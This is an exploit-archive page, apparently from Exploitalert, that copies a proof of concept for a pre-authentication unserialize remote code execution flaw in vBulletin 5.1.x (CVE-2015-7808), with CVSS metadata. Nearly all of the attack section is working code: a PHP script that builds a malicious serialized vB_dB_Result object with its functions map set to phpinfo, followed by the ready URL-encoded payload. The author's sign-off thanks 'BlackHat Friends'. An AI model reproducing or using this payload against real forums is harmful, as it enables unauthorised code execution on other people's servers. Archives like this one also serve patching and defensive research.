Advertisement






Vbulletin 5.1.X Unserialize Preauth RCE Exploit

CVE Category Price Severity
CVE-2015-7808 CWE-94 $1000 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2015-11-09
CPE
cpe:cpe:/a:vbulletin:vbulletin:5.1
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2015110060

Below is a copy:

Vbulletin 5.1.X Unserialize Preauth RCE Exploit[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Exploit Title: Vbulletin 5.1.X Unserialize Preauth RCE Exploit
~# : Date: 2015/11/04
~# : Exploit Author: 4TT4CK3R
~# : Vendor Homepage: http://www.vbulletin.com
~# : Version: 5.1.x
~# : Google Dork : No
~# : Tested on: Kali Linux , Windows 7 , Mozilla Firefox
~# : Build the object !!
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

    php << 'eof'
    <?php
    class vB_Database {
               public $functions = array();

               public function __construct()
               {
                       $this->functions['free_result'] = 'phpinfo';
               }
    }

    class vB_dB_Result {
               protected $db;
               protected $recordset;

               public function __construct()
               {
                       $this->db = new vB_Database();
                       $this->recordset = 1;
               }
        }

    print urlencode(serialize(new vB_dB_Result())) . "n";
    eof
        O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
~# : Discovered by : 4TT4CK3R
~# : Special Thanks : amin0461
~# : Thanks for my BlackHat Friends !!
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]


Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum